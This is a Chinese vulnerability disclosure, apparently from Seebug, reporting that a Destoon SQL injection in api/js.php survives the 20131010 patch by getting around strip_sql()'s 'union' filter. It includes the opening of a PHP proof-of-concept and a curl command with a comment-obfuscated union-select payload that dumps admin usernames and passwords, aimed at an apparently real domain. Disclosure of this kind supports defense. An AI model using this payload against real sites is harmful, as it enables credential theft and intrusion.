Destoon最新版本20131010补丁后,全版本继续注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: Destoon最新版本20131010补丁后,全版本继续注入 ### 详细说明: 问题出在api/js.php这个漏洞,这个星期工作忙,结果别人提交了,官方补丁都出来了。 下载补丁,发现官方的修复比较马虎,没有理解漏洞的本质,分分钟绕过再次注入。 建议官方好好思考一下这个漏洞产生的根本原因。 ### 漏洞证明: [<img src="https://images.seebug.org/upload/201311/241816395e6333869caab8c9d13a33c61ce47d25.jpg" alt="t012aa700b0c5c88fae.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201311/241816395e6333869caab8c9d13a33c61ce47d25.jpg) strip_sql()过滤了union这个字符串,但是实际上是可以绕过的。 由于需要伪造referer,所以用php写的脚本进行漏洞利用,需要根据实际情况修改里面的路径。 POC里面host参数为域名,本机测试为localhost,ver参数为版本,里面写了3,4,5三个版本的利用代码。 ``` <?php //curl "http://www.chinaseed114.com/api/js.php?moduleid=21&pagesize=100&condition=0/**/union\\/**/select\\/**/1,1,1,1,concat(0x7e,0x27,username,0x3a,password,0x27,0x7e),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1%20from%20destoon_member%20where%20admin=1--" --header "REFERER:www.chinaseed114.com" $host=$_GET['host']; $version=$_GET['ver']; if(!$host || !$version) {...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息